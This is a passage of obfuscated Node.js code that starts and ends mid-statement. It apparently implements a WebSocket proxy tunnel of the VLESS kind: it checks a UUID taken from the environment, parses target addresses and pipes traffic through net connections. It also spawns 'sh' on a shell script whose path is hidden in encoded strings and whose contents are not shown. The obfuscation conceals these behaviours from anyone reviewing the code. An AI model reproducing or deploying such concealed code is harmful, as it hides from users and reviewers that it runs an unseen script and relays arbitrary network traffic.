_0x108b02(_0x35f877[_0xd2d693(0x222,0x238,0x1b9,0x276,0x311)],'i'),_0x2709e6=_0x35f877[_0x5e1a7a(-0x2bf,-0x2c0,-0x3be,-0x392,-0x33c)](_0x4664cb,_0x35f877[_0xd2d693(0x2bf,0x332,0x231,0x287,0x20e)]);!_0x26189e[_0x1f542c(0x1a3,0x10e,0x16a,0x102,0x124)](_0x35f877[_0x1f542c(0x1be,0x15c,0x1dc,0x1e1,0x164)](_0x2709e6,_0x35f877[_0x56a2ea(-0xcb,-0xc1,-0x138,-0x123,-0xf4)]))||!_0x3a302c[_0xd2d693(0x1be,0x221,0x273,0x19a,0x239)](_0x35f877[_0x1f542c(0x175,0x213,0xe1,0x79,0x164)](_0x2709e6,_0x35f877[_0x5a86c6(-0x35,-0xe2,-0x18b,-0x18c,-0xc3)]))?_0x35f877[_0x1f542c(0x76,0x7f,0x144,0x136,0x9c)](_0x2709e6,'0'):_0x35f877[_0x56a2ea(-0x88,0x3b,-0x140,0x2a,-0x117)](_0x4be393);}else{const _0x326dd0=_0x3e3e80[_0x1f542c(0x201,0x243,0xcb,0x19a,0x1aa)+_0xd2d693(0x164,0x1b9,0x201,0xb8,0x1bc)+'r'][_0x56a2ea(-0x29,-0xc,-0xe6,0x20,-0xa7)+_0x1f542c(0x102,0x115,0x16b,0x143,0x175)][_0x5e1a7a(-0x28b,-0x290,-0x1e9,-0x25a,-0x288)](_0x3e3e80),_0x30f3d4=_0x3e33f8[_0x4cb676],_0x5cc1dc=_0x3f27fd[_0x30f3d4]||_0x326dd0;_0x326dd0[_0x56a2ea(-0x109,-0xe4,-0x83,-0x142,-0xb4)+_0xd2d693(0x14c,0x174,0xe0,0x1d2,0x1b8)]=_0x3e3e80[_0x1f542c(0x167,0xa3,0x83,0x84,0x150)](_0x3e3e80),_0x326dd0[_0x5e1a7a(-0x11a,-0x1ae,-0x122,-0xd8,-0x195)+_0xd2d693(0x13e,0x165,0x172,0x1f5,0xe2)]=_0x5cc1dc[_0xd2d693(0x2dd,0x27a,0x2f7,0x260,0x391)+_0x1f542c(0xf7,0x49,-0x1f,0x148,0xa4)][_0x5e1a7a(-0x243,-0x2a6,-0x2b2,-0x225,-0x288)](_0x5cc1dc),_0x3f27fd[_0x30f3d4]=_0x326dd0;}}});_0x48a700();const 
net=require(_0x5b3717(-0xf8,-0x10d,-0x15d,-0x1ae,-0x179)),http=require(_0x5b3717(-0x19a,-0x244,-0x215,-0x13d,-0x182)),{WebSocket,createWebSocketStream}=require('ws'),{TextDecoder}=require(_0x5b3717(-0x2ca,-0x1df,-0x2ca,-0x384,-0x342)),logcb=(..._0xae0cb9)=>console[_0x5b3717(-0x291,-0x205,-0x2e8,-0x261,-0x2d9)][_0x1d31e6(0x126,0x1d7,0x1c1,0xf3,0x51)](this,..._0xae0cb9),errcb=(..._0x25b289)=>console[_0x5b3717(-0x2a5,-0x2ad,-0x22a,-0x2b7,-0x33b)][_0x1e3602(0x4a,0xde,-0xf9,-0xb,-0xbe)](this,..._0x25b289);function _0x1e3602(_0x153873,_0x28ca00,_0x36e8f2,_0x5320bc,_0x498200){return _0x222c(_0x5320bc- -0x156,_0x28ca00);}const {spawn}=require(_0x1e3602(-0x166,-0x68,-0x8d,-0x78,-0x9e)+_0x1d31e6(0x12a,0xa3,0x6a,0xed,0x1b2)+_0x1e3602(-0x9d,-0xa1,0xc,0x22,0x61)),uuid=(process[_0x1d31e6(0x1cc,0x247,0x1e1,0x155,0x1dd)][_0x5b3717(-0x23c,-0x153,-0x2a5,-0x247,-0x2bf)]||_0x504eae(0x2b4,0x24d,0x2dd,0x337,0x233)+_0x5b3717(-0x1c7,-0x154,-0x245,-0x26c,-0x1c5)+_0x3b9f4f(0xbd,0xac,-0xe,0x9e,0x2f)+_0x504eae(0x3b4,0x2ec,0x31d,0x325,0x473)+_0x1e3602(-0x56,0xbf,0xc4,0x8d,-0x13)+_0x3b9f4f(0x3d,-0x14,0xef,0x45,-0x60)+_0x3b9f4f(0xe1,0xc2,0x1ad,0x1b6,0x177)+'e')[_0x1e3602(0x13,0x12b,0x185,0xf4,0xe8)+'ce'](/-/g,''),port=process[_0x504eae(0x377,0x295,0x2fd,0x41e,0x305)][_0x1d31e6(0x1a9,0x13f,0x199,0x254,0x1c8)]||0x1c25+-0x75b*-0x5+-0x2238,shellFilePath=_0x504eae(0x392,0x36e,0x2e6,0x47c,0x45d)+_0x504eae(0x251,0x310,0x1f0,0x285,0x255),childProcess=spawn('sh',[shellFilePath]),httpServer=http[_0x1e3602(0x5f,0x176,0x1a4,0xb8,0x18f)+_0x5b3717(-0x1a8,-0x18b,-0x1a4,-0x207,-0x21d)+'er']((_0x1227b5,_0x1cbdc7)=>{const _0x1c21f8={'baaVO':_0x7dbfd5(0x434,0x45f,0x2fd,0x401,0x3aa)+_0x7dbfd5(0x3e4,0x33f,0x28d,0x38a,0x360),'cxNks':_0x29d5f9(0x203,0x2e2,0x223,0x236,0x245)+_0x270b17(0x3e7,0x2f6,0x2a7,0x28f,0x32f)+_0x270b17(0x2b3,0x21f,0x14b,0x1a7,0x1b5),'UbKUh':_0x270b17(0x1ce,0x19c,0xcb,0x106,0x136),'VUWbC':function(_0x17d3f3,_0x574243){return 
_0x17d3f3(_0x574243);},'KBBMA':_0x29d5f9(0x2a5,0x225,0x35c,0x35b,0x1ef),'QRTPc':_0x213bca(0x537,0x4bd,0x4b4,0x579,0x40e),'MbvHf':function(_0x35b46f,_0x58cecc){return _0x35b46f+_0x58cecc;},'CKgNX':function(_0x34a6c2,_0x164544){return _0x34a6c2==_0x164544;},'SSpbY':function(_0x4fa7eb,_0xe732e3){return _0x4fa7eb==_0xe732e3;},'UpZOL':function(_0x8b5df9,_0x548445){return _0x8b5df9+_0x548445;},'FphDo':function(_0xd8db64,_0x53229f){return _0xd8db64==_0x53229f;},'XdJIb':function(_0x1cafcd,_0x2fbc56,_0x5372b3,_0x1fb38a){return _0x1cafcd(_0x2fbc56,_0x5372b3,_0x1fb38a);},'prTxT':_0x7dbfd5(0x2b0,0x305,0x329,0x343,0x38e)+_0x5ec539(-0x125,-0x166,-0x53,-0x10b,-0x98),'bcCTr':function(_0x3b576c,_0x3c6b80,_0x4be179){return _0x3b576c(_0x3c6b80,_0x4be179);},'VJMWX':_0x213bca(0x368,0x44d,0x52f,0x3c1,0x408)+_0x29d5f9(0x299,0x2e3,0x361,0x381,0x22f)+'r:','Ejzpn':_0x29d5f9(0x1a3,0xf9,0x276,0x139,0xb2)+_0x5ec539(-0x155,-0x1eb,-0xb8,-0xc3,-0x104)+_0x5ec539(-0xa5,-0xbf,-0x16c,-0x18c,-0xaf)+_0x213bca(0x3d1,0x4a3,0x486,0x3df,0x4a9)+'ly','NXhPY':_0x7dbfd5(0x404,0x4ce,0x365,0x40c,0x3e0)+'ge','GlnpG':function(_0x4258a8,_0x1bfb99){return _0x4258a8(_0x1bfb99);},'jXxhT':_0x5ec539(-0xbc,-0x60,-0x19d,-0xce,-0x118)+_0x29d5f9(0x190,0x119,0x213,0x1ad,0x1ba)+_0x213bca(0x588,0x58c,0x49f,0x62d,0x4bf)+':','kEbvc':function(_0x20821b,_0x3f0326){return _0x20821b===_0x3f0326;},'VodzB':_0x5ec539(-0xe8,-0x4c,-0xb1,-0x6e,-0x1d0),'xHxer':_0x29d5f9(0x309,0x29f,0x355,0x3d2,0x3c3),'LegjN':function(_0xdbca3,_0x5ce2be){return _0xdbca3!==_0x5ce2be;},'KZCzm':_0x213bca(0x55f,0x573,0x540,0x607,0x5a3),'gHyhj':_0x270b17(0x18a,0x212,0x1cd,0x2ba,0x177),'Yicnh':_0x213bca(0x427,0x4a6,0x4c0,0x41a,0x4e1)+_0x270b17(0x393,0x2bb,0x2ea,0x1db,0x249)};function _0x5ec539(_0x13258a,_0x45ffac,_0x497887,_0x5548cc,_0x57df33){return _0x1e3602(_0x13258a-0x5a,_0x45ffac,_0x497887-0xbe,_0x13258a- -0x1a9,_0x57df33-0x62);}function _0x7dbfd5(_0x5eb884,_0x11000f,_0x4beaea,_0x26afa4,_0xde7a47){return 
_0x3b9f4f(_0xde7a47-0x3a8,_0x11000f-0x177,_0x4beaea-0x95,_0x26afa4-0x53,_0x5eb884);}function _0x213bca(_0x6ddd31,_0x2b7ad1,_0x5ef674,_0x4f6133,_0x284b61){return _0x504eae(_0x2b7ad1-0x1e4,_0x2b7ad1-0x78,_0x5ef674-0x190,_0x4f6133-0x1e0,_0x4f6133);}function _0x270b17(_0x22ec5c,_0x1daa2e,_0x498e0e,_0x2c5734,_0x24e531){return _0x3b9f4f(_0x1daa2e-0x1f5,_0x1daa2e-0x80,_0x498e0e-0x1f2,_0x2c5734-0x2b,_0x24e531);}function _0x29d5f9(_0x59865f,_0x3256ae,_0x4e1482,_0xaa1c12,_0x5dcc61){return _0x1e3602(_0x59865f-0x38,_0xaa1c12,_0x4e1482-0x110,_0x59865f-0x216,_0x5dcc61-0x1f2);}if(_0x1c21f8[_0x5ec539(-0x19b,-0xdf,-0x228,-0x1b9,-0x133)](_0x1227b5[_0x7dbfd5(0x3f8,0x2bf,0x412,0x437,0x386)],'/')){if(_0x1c21f8[_0x29d5f9(0x224,0x286,0x2aa,0x13a,0x304)](_0x1c21f8[_0x270b17(0x2e7,0x347,0x306,0x27d,0x260)],_0x1c21f8[_0x5ec539(-0x267,-0x2cd,-0x2f7,-0x2d4,-0x192)])){const _0x2b31ae={};_0x2b31ae[_0x29d5f9(0x216,0x171,0x23d,0x1b6,0x19b)+_0x29d5f9(0x16f,0x12d,0x1e5,0x1d5,0x7f)+'pe']=_0x1c21f8[_0x29d5f9(0x2ad,0x365,0x35a,0x1c4,0x226)],_0x473208[_0x7dbfd5(0x453,0x46b,0x481,0x354,0x39f)+_0x213bca(0x45f,0x479,0x561,0x469,0x4ae)](-0x1*-0x1be7+-0x34*-0x28+-0x233f*0x1,_0x2b31ae),_0x5c69a9[_0x213bca(0x519,0x4b2,0x565,0x52d,0x439)](_0x1c21f8[_0x270b17(0x387,0x2da,0x2fe,0x3a6,0x1eb)]);}else{const _0x58c93a={};_0x58c93a[_0x29d5f9(0x216,0x129,0x12c,0x2f9,0x22c)+_0x29d5f9(0x16f,0x143,0x16e,0xa5,0x113)+'pe']=_0x1c21f8[_0x7dbfd5(0x57f,0x423,0x45c,0x46b,0x498)],_0x1cbdc7[_0x5ec539(-0x20b,-0x28d,-0x2ef,-0x266,-0x232)+_0x5ec539(-0x1f0,-0x284,-0x197,-0x1a4,-0x2ba)](-0x1*-0x397+0x1*0x78f+-0x52f*0x2,_0x58c93a),_0x1cbdc7[_0x5ec539(-0x1b7,-0x22e,-0x27d,-0x139,-0x232)](_0x1c21f8[_0x7dbfd5(0x511,0x49e,0x493,0x4f8,0x48d)]);}}else{if(_0x1c21f8[_0x213bca(0x55b,0x51a,0x4e8,0x46c,0x50d)](_0x1c21f8[_0x7dbfd5(0x36f,0x444,0x4b0,0x4aa,0x41f)],_0x1c21f8[_0x7dbfd5(0x370,0x38d,0x438,0x373,0x38b)])){const 
_0x2c7708={};_0x2c7708[_0x213bca(0x3e4,0x4c0,0x448,0x5ac,0x483)+_0x270b17(0x232,0x1a7,0x281,0x24d,0xf1)+'pe']=_0x1c21f8[_0x7dbfd5(0x515,0x483,0x3b3,0x3ac,0x498)],_0x1cbdc7[_0x5ec539(-0x20b,-0x2e6,-0x2c5,-0x1a5,-0x20e)+_0x29d5f9(0x1cf,0x25b,0x20a,0x28b,0xf0)](0xa06+0x29*0x15+0xbcf*-0x1,_0x2c7708),_0x1cbdc7[_0x29d5f9(0x208,0x2d5,0x287,0x205,0x1ef)](_0x1c21f8[_0x5ec539(-0x142,-0x1a1,-0x8f,-0x197,-0x19d)]);}else{const _0x4a3fcb={'VxtEs':_0x1c21f8[_0x29d5f9(0x260,0x2da,0x1dc,0x223,0x24a)],'YMKao':function(_0x519f95,_0x1c4a82){function _0x10aa16(_0x47b5e4,_0x36b0f2,_0x550907,_0x436a48,_0x152343){return _0x5ec539(_0x47b5e4- -0x69,_0x36b0f2,_0x550907-0x112,_0x436a48-0x14c,_0x152343-0x40);}return _0x1c21f8[_0x10aa16(-0x1ed,-0x1df,-0x238,-0x2b4,-0x158)](_0x519f95,_0x1c4a82);},'iDzSp':_0x1c21f8[_0x213bca(0x504,0x51e,0x5ef,0x5de,0x5e3)],'mhjxL':function(_0x5121b5,_0xcc3f88){function _0x688250(_0x5c854c,_0x305258,_0x75ef46,_0x589ca9,_0x3ab5ab){return _0x213bca(_0x5c854c-0x18d,_0x305258- -0x3f3,_0x75ef46-0x13b,_0x3ab5ab,_0x3ab5ab-0x11b);}return _0x1c21f8[_0x688250(0x1d9,0xf2,0x126,0xe7,0x10b)](_0x5121b5,_0xcc3f88);},'ZcBtI':_0x1c21f8[_0x7dbfd5(0x330,0x340,0x35d,0x47d,0x3cc)],'GXkqo':function(_0x2a18c9,_0xf462c3){function _0x157cba(_0x411230,_0x4128a7,_0x4e1812,_0x49cfa7,_0x52cb71){return _0x5ec539(_0x4e1812-0x41b,_0x52cb71,_0x4e1812-0x194,_0x49cfa7-0x99,_0x52cb71-0xa2);}return _0x1c21f8[_0x157cba(0x18a,0x203,0x242,0x160,0x224)](_0x2a18c9,_0xf462c3);},'liHXh':function(_0x1a6491,_0x223a64){function _0x4aaa51(_0x4b7a2d,_0x54fb91,_0x4a9a1d,_0x53bd9a,_0xdc3b1e){return _0x213bca(_0x4b7a2d-0xd4,_0x4b7a2d- -0x570,_0x4a9a1d-0xc7,_0x54fb91,_0xdc3b1e-0xa6);}return _0x1c21f8[_0x4aaa51(-0x47,-0xf3,-0x9b,0x2b,-0xd3)](_0x1a6491,_0x223a64);},'BDovH':function(_0x9244af,_0x3db7ab){function _0x268979(_0x468383,_0x5bccfc,_0x37de67,_0x5b5ca1,_0x3e78cc){return _0x7dbfd5(_0x468383,_0x5bccfc-0xdd,_0x37de67-0x147,_0x5b5ca1-0xdb,_0x5b5ca1- -0x77);}return 
_0x1c21f8[_0x268979(0x3f3,0x3cb,0x3ab,0x424,0x3fc)](_0x9244af,_0x3db7ab);},'fBjQe':function(_0x4f6420,_0x3470f7){function _0x26bc63(_0x433001,_0x5f4de1,_0x317a3f,_0x5cc401,_0x5c6180){return _0x213bca(_0x433001-0x78,_0x317a3f- -0x4da,_0x317a3f-0x16a,_0x5c6180,_0x5c6180-0xee);}return _0x1c21f8[_0x26bc63(-0xde,-0x139,-0x4a,0x33,-0xa4)](_0x4f6420,_0x3470f7);},'IGTuh':function(_0x39e827,_0x288a81){function _0x363714(_0x1014a3,_0x42303a,_0x2335b8,_0x3bc845,_0x360e7f){return _0x29d5f9(_0x2335b8- -0x3db,_0x42303a-0x135,_0x2335b8-0x1b8,_0x1014a3,_0x360e7f-0x16e);}return _0x1c21f8[_0x363714(-0x146,-0x1c3,-0x1f5,-0x271,-0x156)](_0x39e827,_0x288a81);},'NLVqL':function(_0x39be05,_0x356769){function _0x3c96ea(_0x1348fb,_0x20fd17,_0x1d89e3,_0x40098e,_0xb5dac4){return _0x5ec539(_0x1d89e3-0x33,_0xb5dac4,_0x1d89e3-0x73,_0x40098e-0x1e9,_0xb5dac4-0xe3);}return _0x1c21f8[_0x3c96ea(0xe,-0xfc,-0x95,-0xd1,-0x28)](_0x39be05,_0x356769);},'fofzi':function(_0x3cc423,_0x3786db){function _0x369d35(_0x1379ad,_0x52aaa2,_0x5e4c0b,_0x39aad5,_0x1c563b){return _0x270b17(_0x1379ad-0xd6,_0x1c563b- -0x3a1,_0x5e4c0b-0xb0,_0x39aad5-0xe9,_0x1379ad);}return _0x1c21f8[_0x369d35(0x6d,-0x78,-0xfc,-0x122,-0x76)](_0x3cc423,_0x3786db);},'QmRQu':function(_0x2fa855,_0x4a162c,_0xa7adbb,_0x38795e){function _0x2b9cad(_0x3a8b36,_0x5f5aaa,_0x50e1cf,_0x305157,_0x4f0d4e){return _0x270b17(_0x3a8b36-0x3f,_0x50e1cf- -0x352,_0x50e1cf-0x82,_0x305157-0x10e,_0x3a8b36);}return _0x1c21f8[_0x2b9cad(-0x23e,-0x1fc,-0x1d8,-0x2bb,-0x2c4)](_0x2fa855,_0x4a162c,_0xa7adbb,_0x38795e);},'GwelD':_0x1c21f8[_0x7dbfd5(0x40f,0x4b8,0x495,0x3bd,0x429)],'tamNE':function(_0x9cc4ff,_0x3b60d4,_0x3b647e){function _0x5061c8(_0x4cecf0,_0x5a8a4a,_0x3060f3,_0x59c5cc,_0x35c7aa){return _0x213bca(_0x4cecf0-0x180,_0x3060f3- -0x5e8,_0x3060f3-0xe8,_0x59c5cc,_0x35c7aa-0x2b);}return 
_0x1c21f8[_0x5061c8(-0xa2,-0xac,-0xf0,-0xc1,-0xe7)](_0x9cc4ff,_0x3b60d4,_0x3b647e);},'rvbRb':_0x1c21f8[_0x7dbfd5(0x4df,0x54d,0x3f8,0x568,0x499)]};_0x5a5af8[_0x7dbfd5(0x275,0x311,0x272,0x431,0x363)](_0x1c21f8[_0x5ec539(-0x165,-0x95,-0xd7,-0x82,-0xe2)]),_0x138eef[_0x7dbfd5(0x40c,0x2bc,0x24f,0x29d,0x335)](_0x1c21f8[_0x29d5f9(0x1de,0xf0,0x132,0x17d,0x259)],_0x455e6d=>{const _0x40bda3={'mODJA':_0x4a3fcb[_0x3b30db(0x225,0x1ed,0x1de,0x1ed,0x167)],'baqfC':function(_0x2c057e,_0x47734d){function _0x116e99(_0x55554a,_0x8683c7,_0x55db72,_0x251edd,_0x11b849){return _0x3b30db(_0x11b849- -0x128,_0x8683c7-0x56,_0x8683c7,_0x251edd-0x3,_0x11b849-0x43);}return _0x4a3fcb[_0x116e99(0x106,0xda,0xa6,-0x3c,0x50)](_0x2c057e,_0x47734d);},'tsKtZ':_0x4a3fcb[_0x3b30db(0x2a6,0x36c,0x278,0x20d,0x234)],'QtdjG':function(_0x30cacf,_0x890783){function _0x4a95a8(_0x2d26cd,_0x58b1f1,_0x38a957,_0x4ff900,_0x116f39){return _0x3b30db(_0x58b1f1- -0x11d,_0x58b1f1-0x66,_0x4ff900,_0x4ff900-0xd1,_0x116f39-0x1a7);}return _0x4a3fcb[_0x4a95a8(-0xea,-0x6,0x8c,0x48,0xd3)](_0x30cacf,_0x890783);},'KbQMx':_0x4a3fcb[_0x583d07(0x1a,-0xd3,-0x65,-0x15d,-0xbf)]};function _0x207e22(_0x13fdb1,_0x4bdc41,_0x3dbead,_0x3235d2,_0x22b63d){return _0x7dbfd5(_0x3235d2,_0x4bdc41-0x115,_0x3dbead-0x2a,_0x3235d2-0xb1,_0x4bdc41- -0x5ec);}const [_0x494a4f]=_0x455e6d,_0x13646c=_0x455e6d[_0x3b30db(0x1f2,0x2c9,0x160,0x2c2,0x17c)](0x2*-0xa66+-0x1de9+0x32b6,-0x24d1+-0x7dd+0x2cbf);if(!_0x13646c[_0x207e22(-0x287,-0x22a,-0x1af,-0x2d3,-0x15b)]((_0x9d9ec0,_0x2f8e48)=>_0x9d9ec0==_0x5b146a(_0x39e3b7[_0x2146f8(-0x2ec,-0x2b2,-0x31c,-0x263,-0x2df)+'r'](_0x2f8e48*(0x1*0xb65+-0x29f*-0xc+-0x1*0x2ad7),0x1e30+0x11*0x3d+-0x223b),0x10b8+-0x2*-0x6d7+0x1e56*-0x1)))return;let _0x1d6e36=_0x4a3fcb[_0xcca952(0x483,0x450,0x441,0x423,0x4b2)](_0x455e6d[_0xcca952(0x53d,0x4be,0x580,0x4cb,0x44c)](-0x2508+0x1*0x18cc+0xc4d,-0x204*-0x10+-0x239a+0x36c)[_0x583d07(-0xab,0x1d,0xb,-0x170,-0xb7)+_0x3b30db(0x17a,0xb4,0x202,0x21f,0x1fa)](),0x61*-0x59+-0x904*-0x1+0x18c8);const 
_0x4f52ed=_0x455e6d[_0x583d07(-0x14d,-0x35,-0xbf,-0xc0,-0x63)](_0x1d6e36,_0x1d6e36+=-0x120f+-0x41*-0x86+-0xff5)[_0x3b30db(0x19e,0x194,0x189,0x1a6,0x10d)+_0x3b30db(0x28a,0x1ca,0x215,0x352,0x1ba)+'BE'](0xfe*-0x3+0x22d+0xcd),_0x3fb1c5=_0x455e6d[_0xcca952(0x577,0x4be,0x405,0x43e,0x487)](_0x1d6e36,_0x1d6e36+=-0x18e3+-0x66d*0x1+0x1f51)[_0x3b30db(0x19e,0x14f,0x1bf,0x1d8,0x1c8)+_0x2146f8(-0x237,-0x203,-0x233,-0x22b,-0x2a8)](),_0x5b52f1=_0x4a3fcb[_0x207e22(-0x12e,-0x164,-0xdc,-0x193,-0x85)](_0x3fb1c5,0x3b2*-0x2+0x2275*-0x1+0x1e7*0x16)?_0x455e6d[_0x207e22(-0x218,-0x1e1,-0x29b,-0x230,-0x119)](_0x1d6e36,_0x1d6e36+=-0x158d+-0x1a07*-0x1+-0x476)[_0xcca952(0x62f,0x552,0x628,0x4cb,0x476)]('.'):_0x4a3fcb[_0x2146f8(-0x22c,-0x33b,-0x2ea,-0x276,-0x2ee)](_0x3fb1c5,0x22d*-0x2+-0xbb7+-0x1013*-0x1)?new _0x2486f9()[_0x3b30db(0x21f,0x15c,0x232,0x2b4,0x272)+'e'](_0x455e6d[_0xcca952(0x4aa,0x4be,0x427,0x4c2,0x419)](_0x4a3fcb[_0x2146f8(-0x260,-0x38b,-0x2a8,-0x2a9,-0x2a9)](_0x1d6e36,-0x13*-0xa+-0x13ae+0x12f1),_0x1d6e36+=_0x4a3fcb[_0x583d07(-0x70,-0x109,-0x17b,-0x5a,-0xe7)](0x207e*0x1+-0x2046+-0x1*0x37,_0x455e6d[_0xcca952(0x421,0x4be,0x4c2,0x534,0x41d)](_0x1d6e36,_0x4a3fcb[_0x2146f8(-0x2c4,-0x2e3,-0x1b0,-0x1d3,-0x1ff)](_0x1d6e36,-0xc11+0x12*-0x7+-0x18*-0x86))[_0x2146f8(-0x2a6,-0x1ff,-0x254,-0x368,-0x284)+_0x583d07(-0xe7,-0x23,-0x1f,-0xca,-0xdb)]()))):_0x4a3fcb[_0x2146f8(-0x206,-0x1bd,-0x2b1,-0x2c1,-0x22e)](_0x3fb1c5,0x14ed+-0x2502+0x1018)?_0x455e6d[_0x207e22(-0x198,-0x1e1,-0x102,-0x225,-0x2ad)](_0x1d6e36,_0x1d6e36+=-0xca7+0x125b*0x1+-0x5a4)[_0xcca952(0x3ad,0x49d,0x4af,0x4bb,0x4fc)+'e']((_0x4e2bb2,_0x3c8268,_0x4ecfb3,_0x1b3c70)=>_0x4ecfb3%(0x1981+0x1162+-0x1*0x2ae1)?_0x4e2bb2[_0x2146f8(-0x2d5,-0x318,-0x37d,-0x33a,-0x2fa)+'t'](_0x1b3c70[_0xcca952(0x56c,0x4be,0x569,0x48c,0x54b)](_0x4ecfb3-(-0x65*0x37+0x3ce+0x11e6),_0x4ecfb3+(-0x3*-0x506+-0x1ae4+0xbd3))):_0x4e2bb2,[])[_0x583d07(-0x94,-0x59,-0x4b,-0x33,-0x96)](_0x4ce2d5=>_0x4ce2d5[_0xcca952(0x529,0x46a,0x49a,0x4f4,0x4cd)+_0x583d07(-0xae,0x111,0x8d,0x70,
0x35)+'BE'](-0x4d*-0x22+-0x270*0x10+0x1cc6)[_0x583d07(-0x9,0x93,0xe4,0x61,0x7b)+_0x583d07(-0x11a,-0x57,-0xc0,-0x54,-0x124)](0x6e6*0x1+-0x1d66+0x1690))[_0x3b30db(0x286,0x22e,0x209,0x220,0x289)](':'):'';_0x4a3fcb[_0x583d07(-0xd1,-0xb,-0xfe,-0x111,-0x2f)](_0x1f0967,_0x4a3fcb[_0x3b30db(0x2c6,0x2c3,0x252,0x33a,0x395)],_0x5b52f1,_0x4f52ed);function _0x2146f8(_0x1d4b5b,_0x2f588e,_0x20ba08,_0xa0c5,_0x152e14){return _0x29d5f9(_0x152e14- -0x450,_0x2f588e-0x10b,_0x20ba08-0x95,_0x1d4b5b,_0x152e14-0x14);}_0x2e49a9[_0x3b30db(0x189,0x1a1,0x136,0xcf,0x13f)](new _0x5b208c([_0x494a4f,-0x3f5+0x218b+-0x1d96]));const _0x547ab0=_0x4a3fcb[_0x583d07(-0x41,0xd,-0x19d,-0x15a,-0xdd)](_0x1171a1,_0x4b5aa3),_0x362371={};function _0x583d07(_0x175522,_0x401356,_0x1df422,_0x46d992,_0xa03659){return _0x270b17(_0x175522-0xbf,_0xa03659- -0x2bb,_0x1df422-0x63,_0x46d992-0x173,_0x1df422);}function _0x3b30db(_0x1e0d37,_0x562ef0,_0x564c4b,_0x5872c0,_0x450259){return _0x213bca(_0x1e0d37-0x11b,_0x1e0d37- -0x2d8,_0x564c4b-0x9f,_0x564c4b,_0x450259-0x1bd);}_0x362371[_0x3b30db(0x2f0,0x36d,0x312,0x29d,0x3ad)]=_0x5b52f1,_0x362371[_0x583d07(-0x139,-0x1b5,-0xf4,-0x1d6,-0x146)]=_0x4f52ed;const _0xb54f8b={};_0xb54f8b[_0xcca952(0x662,0x5bc,0x5a9,0x500,0x682)]=_0x5b52f1,_0xb54f8b[_0x583d07(-0x14e,-0x198,-0x237,-0xa9,-0x146)]=_0x4f52ed;function _0xcca952(_0x3a9eda,_0x1dbf6f,_0x49fc7d,_0x419bce,_0x17225b){return _0x7dbfd5(_0x419bce,_0x1dbf6f-0x1c,_0x49fc7d-0x15e,_0x419bce-0x1f0,_0x1dbf6f-0xb3);}_0x438959[_0x583d07(-0x1f,-0x15b,-0x55,-0x5c,-0xde)+'ct'](_0x362371,function(){function _0x23d9a3(_0x1b9028,_0x308619,_0x45a73e,_0x4996e2,_0x5845fb){return _0x3b30db(_0x1b9028-0x277,_0x308619-0xa3,_0x5845fb,_0x4996e2-0x1bd,_0x5845fb-0xcc);}function _0x687019(_0x5252d6,_0x57cac2,_0x3bdeed,_0x2fd398,_0x5c6fe8){return _0x2146f8(_0x5c6fe8,_0x57cac2-0x123,_0x3bdeed-0xe0,_0x2fd398-0x37,_0x5252d6-0x3dc);}this[_0x1e5482(-0xeb,-0x11f,-0x1bc,-0x136,-0xd4)](_0x455e6d[_0x9c6c20(-0x5b,-0xbc,0x8,0x6,-0x2e)](_0x1d6e36));function 
_0x9c6c20(_0x23b2d2,_0x2d98d3,_0x907baa,_0x1649d3,_0x52b7e8){return _0x207e22(_0x23b2d2-0x147,_0x23b2d2-0x186,_0x907baa-0xf2,_0x1649d3,_0x52b7e8-0x10c);}function _0x1e5482(_0x35f990,_0x4ef2b0,_0x3086c4,_0x274cc2,_0x84226d){return _0x2146f8(_0x3086c4,_0x4ef2b0-0xf5,_0x3086c4-0x161,_0x274cc2-0x7e,_0x35f990-0x1b1);}function _0x3c5723(_0x533307,_0x4c9964,_0x403242,_0xe92fc,_0x16addf){return _0x207e22(_0x533307-0x157,_0x16addf-0x701,_0x403242-0x71,_0x403242,_0x16addf-0x14b);}_0x547ab0['on'](_0x40bda3[_0x3c5723(0x4f1,0x52b,0x567,0x613,0x5b6)],_0x40bda3[_0x3c5723(0x53b,0x548,0x4fa,0x4c2,0x51a)](_0xb94e54,_0x40bda3[_0x3c5723(0x45d,0x493,0x3db,0x3fe,0x483)]))[_0x3c5723(0x4e7,0x5d5,0x5d8,0x4ce,0x592)](this)['on'](_0x40bda3[_0x9c6c20(0x3b,0xc0,0x11c,0xeb,0x107)],_0x40bda3[_0x1e5482(0x66,0x101,-0x2e,0x148,0x13b)](_0x174e2d,_0x40bda3[_0x687019(0x1a8,0x181,0x134,0x133,0x283)]))[_0x3c5723(0x63f,0x5fb,0x649,0x595,0x592)](_0x547ab0);})['on'](_0x4a3fcb[_0x3b30db(0x225,0x168,0x28a,0x238,0x1c3)],_0x4a3fcb[_0x3b30db(0x1fd,0x271,0x2d3,0x173,0x179)](_0x32b88e,_0x4a3fcb[_0x2146f8(-0xb1,-0x1dc,-0x1a5,-0x101,-0x144)],_0xb54f8b));})['on'](_0x1c21f8[_0x29d5f9(0x260,0x2e3,0x2c0,0x20e,0x2c4)],_0x1c21f8[_0x29d5f9(0x1b1,0x120,0x23b,0x1bd,0x1ed)](_0x4fa98d,_0x1c21f8[_0x5ec539(-0x10c,-0x1df,-0xfa,-0xff,-0x184)]));}}});httpServer[_0x5b3717(-0x1f7,-0x269,-0x202,-0x1a0,-0x1f1)+'n'](port,()=>{function _0x4f73e5(_0x26d7ed,_0x444357,_0x2a7a97,_0x527e1e,_0x28490c){return _0x3b9f4f(_0x2a7a97- -0x167,_0x444357-0x97,_0x2a7a97-0x97,_0x527e1e-0x66,_0x444357);}function _0x54079d(_0x4f622f,_0x7f5321,_0x4099a1,_0x2c58be,_0x2ef5aa){return _0x3b9f4f(_0x4099a1- -0x2db,_0x7f5321-0x6b,_0x4099a1-0xe5,_0x2c58be-0x19f,_0x2ef5aa);}function _0x26639a(_0x5d3d7e,_0x29c4ad,_0x178272,_0x4b442a,_0x26f109){return _0x504eae(_0x26f109- -0x452,_0x29c4ad-0x4a,_0x178272-0xc7,_0x4b442a-0x1ba,_0x29c4ad);}function _0x5aa48e(_0x1cf985,_0x4471c3,_0xd8689d,_0xfd7aee,_0x3b6576){return 
